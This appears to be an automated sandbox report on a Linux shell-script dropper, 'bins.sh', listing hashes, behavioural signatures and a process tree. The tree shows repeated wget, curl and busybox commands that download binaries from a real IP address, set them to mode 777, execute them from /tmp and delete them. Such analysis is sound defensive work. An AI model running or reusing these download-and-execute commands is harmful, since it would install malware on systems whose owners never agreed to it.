Analysis
-
max time kernel
30s -
max time network
130s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240611-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
04-11-2024 04:02
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
3974491d00b9582e0258135c610a9421
-
SHA1
ecc37a0827534c2c0481e0612cd6df3fc19cf86e
-
SHA256
6bfa6f703269861e72d2adaf8105b6e76da66084c6242ca779b0a88fba559328
-
SHA512
7ede6a7178e143e32559bf9d3d51f2a6ab740c5e865bac2d7a173aef231ba0856edd270e2d8cada9440d33606071b1b89fda997c11b31fe7121618274641b57a
-
SSDEEP
192:hZC8+oCsQQl95VnaK4St9bi6I7HDvb5k8h74i6I7H/0vb5k8EC8+oCsQQHZ5VnaZ:hZhVrQQlSSnCvb5k8h790vb5k8EhVrQZ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
pid Process
1599 chmod
1563 chmod
1545 chmod
1569 chmod
1587 chmod
1514 chmod
1539 chmod
1520 chmod
1593 chmod
1617 chmod
1623 chmod
1629 chmod
1551 chmod
1654 chmod
1666 chmod
1526 chmod
1532 chmod
1581 chmod
1636 chmod
1674 chmod
1508 chmod
1648 chmod
1557 chmod
1605 chmod
1611 chmod
1642 chmod
1660 chmod
1575 chmod
-
Executes dropped EXE 28 IoCs
-
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
pid Process
1625 rm
1578 wget
1579 curl
1583 rm
1624 13LziPPOU64KElhsy06VSGNerH5jNdigll
1622 busybox
1580 busybox
1582 13LziPPOU64KElhsy06VSGNerH5jNdigll
1620 wget
1621 curl
-
Writes file to tmp directory 32 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:1500
-
/bin/rm/bin/rm bins.sh2⤵PID:1501
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:1502
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- Writes file to tmp directory
PID:1506
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:1507
-
-
/bin/chmodchmod 777 Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- File and Directory Permissions Modification
PID:1508
-
-
/tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE./Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- Executes dropped EXE
PID:1509
-
-
/bin/rmrm Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:1510
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:1511
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- Writes file to tmp directory
PID:1512
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:1513
-
-
/bin/chmodchmod 777 EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- File and Directory Permissions Modification
PID:1514
-
-
/tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd./EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- Executes dropped EXE
PID:1515
-
-
/bin/rmrm EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:1516
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:1517
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- Writes file to tmp directory
PID:1518
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:1519
-
-
/bin/chmodchmod 777 NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- File and Directory Permissions Modification
PID:1520
-
-
/tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi./NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- Executes dropped EXE
PID:1521
-
-
/bin/rmrm NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:1522
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:1523
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- Writes file to tmp directory
PID:1524
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:1525
-
-
/bin/chmodchmod 777 v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- File and Directory Permissions Modification
PID:1526
-
-
/tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA./v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- Executes dropped EXE
PID:1527
-
-
/bin/rmrm v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:1528
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Writes file to tmp directory
PID:1529
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Writes file to tmp directory
PID:1530
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Writes file to tmp directory
PID:1531
-
-
/bin/chmodchmod 777 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- File and Directory Permissions Modification
PID:1532
-
-
/tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB./0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Executes dropped EXE
PID:1533
-
-
/bin/rmrm 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵PID:1535
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:1536
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- Writes file to tmp directory
PID:1537
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:1538
-
-
/bin/chmodchmod 777 MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- File and Directory Permissions Modification
PID:1539
-
-
/tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU./MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- Executes dropped EXE
PID:1540
-
-
/bin/rmrm MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:1541
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:1542
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- Writes file to tmp directory
PID:1543
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:1544
-
-
/bin/chmodchmod 777 QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- File and Directory Permissions Modification
PID:1545
-
-
/tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1./QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- Executes dropped EXE
PID:1546
-
-
/bin/rmrm QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:1547
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:1548
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- Writes file to tmp directory
PID:1549
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:1550
-
-
/bin/chmodchmod 777 xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- File and Directory Permissions Modification
PID:1551
-
-
/tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz./xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- Executes dropped EXE
PID:1552
-
-
/bin/rmrm xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:1553
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:1554
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- Writes file to tmp directory
PID:1555
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:1556
-
-
/bin/chmodchmod 777 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- File and Directory Permissions Modification
PID:1557
-
-
/tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5./4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- Executes dropped EXE
PID:1558
-
-
/bin/rmrm 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:1559
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:1560
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- Writes file to tmp directory
PID:1561
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:1562
-
-
/bin/chmodchmod 777 xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- File and Directory Permissions Modification
PID:1563
-
-
/tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R./xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- Executes dropped EXE
PID:1564
-
-
/bin/rmrm xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:1565
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:1566
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- Writes file to tmp directory
PID:1567
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:1568
-
-
/bin/chmodchmod 777 YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- File and Directory Permissions Modification
PID:1569
-
-
/tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj./YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- Executes dropped EXE
PID:1570
-
-
/bin/rmrm YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:1571
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:1572
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- Writes file to tmp directory
PID:1573
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:1574
-
-
/bin/chmodchmod 777 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- File and Directory Permissions Modification
PID:1575
-
-
/tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20./1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- Executes dropped EXE
PID:1576
-
-
/bin/rmrm 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:1577
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:1578
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1579
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:1580
-
-
/bin/chmodchmod 777 13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- File and Directory Permissions Modification
PID:1581
-
-
/tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll./13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1582
-
-
/bin/rmrm 13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:1583
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:1584
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- Writes file to tmp directory
PID:1585
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:1586
-
-
/bin/chmodchmod 777 b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- File and Directory Permissions Modification
PID:1587
-
-
/tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R./b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- Executes dropped EXE
PID:1588
-
-
/bin/rmrm b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:1589
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:1590
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- Writes file to tmp directory
PID:1591
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:1592
-
-
/bin/chmodchmod 777 YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- File and Directory Permissions Modification
PID:1593
-
-
/tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj./YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- Executes dropped EXE
PID:1594
-
-
/bin/rmrm YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:1595
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:1596
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- Writes file to tmp directory
PID:1597
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:1598
-
-
/bin/chmodchmod 777 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- File and Directory Permissions Modification
PID:1599
-
-
/tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5./4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- Executes dropped EXE
PID:1600
-
-
/bin/rmrm 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:1601
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:1602
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- Writes file to tmp directory
PID:1603
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:1604
-
-
/bin/chmodchmod 777 xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- File and Directory Permissions Modification
PID:1605
-
-
/tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R./xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- Executes dropped EXE
PID:1606
-
-
/bin/rmrm xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:1607
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:1608
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- Writes file to tmp directory
PID:1609
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:1610
-
-
/bin/chmodchmod 777 b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- File and Directory Permissions Modification
PID:1611
-
-
/tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R./b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- Executes dropped EXE
PID:1612
-
-
/bin/rmrm b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:1613
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:1614
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- Writes file to tmp directory
PID:1615
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:1616
-
-
/bin/chmodchmod 777 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- File and Directory Permissions Modification
PID:1617
-
-
/tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20./1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- Executes dropped EXE
PID:1618
-
-
/bin/rmrm 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:1619
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:1620
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1621
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:1622
-
-
/bin/chmodchmod 777 13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- File and Directory Permissions Modification
PID:1623
-
-
/tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll./13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1624
-
-
/bin/rmrm 13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:1625
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Writes file to tmp directory
PID:1626
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Writes file to tmp directory
PID:1627
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Writes file to tmp directory
PID:1628
-
-
/bin/chmodchmod 777 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- File and Directory Permissions Modification
PID:1629
-
-
/tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB./0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Executes dropped EXE
PID:1630
-
-
/bin/rmrm 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵PID:1632
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:1633
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- Writes file to tmp directory
PID:1634
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:1635
-
-
/bin/chmodchmod 777 Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- File and Directory Permissions Modification
PID:1636
-
-
/tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE./Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- Executes dropped EXE
PID:1637
-
-
/bin/rmrm Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:1638
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:1639
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- Writes file to tmp directory
PID:1640
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:1641
-
-
/bin/chmodchmod 777 EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- File and Directory Permissions Modification
PID:1642
-
-
/tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd./EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- Executes dropped EXE
PID:1643
-
-
/bin/rmrm EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:1644
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:1645
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- Writes file to tmp directory
PID:1646
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:1647
-
-
/bin/chmodchmod 777 NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- File and Directory Permissions Modification
PID:1648
-
-
/tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi./NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- Executes dropped EXE
PID:1649
-
-
/bin/rmrm NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:1650
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:1651
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- Writes file to tmp directory
PID:1652
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:1653
-
-
/bin/chmodchmod 777 v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- File and Directory Permissions Modification
PID:1654
-
-
/tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA./v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- Executes dropped EXE
PID:1655
-
-
/bin/rmrm v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:1656
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:1657
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- Writes file to tmp directory
PID:1658
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:1659
-
-
/bin/chmodchmod 777 xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- File and Directory Permissions Modification
PID:1660
-
-
/tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz./xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- Executes dropped EXE
PID:1661
-
-
/bin/rmrm xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:1662
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:1663
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- Writes file to tmp directory
PID:1664
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:1665
-
-
/bin/chmodchmod 777 MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- File and Directory Permissions Modification
PID:1666
-
-
/tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU./MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- Executes dropped EXE
PID:1667
-
-
/bin/rmrm MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:1668
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:1669
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- Writes file to tmp directory
PID:1670
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:1671
-
-
/bin/chmodchmod 777 QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- File and Directory Permissions Modification
PID:1674
-
-
/tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1./QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- Executes dropped EXE
PID:1675
-
-
/bin/rmrm QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:1676
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
141KB
MD5
3ca8decdb1e52c423c521bfff02ac200
SHA1
8621ecd6807109b8541912ad9e134f6fb49bfd48
SHA256
dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f
SHA512
b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97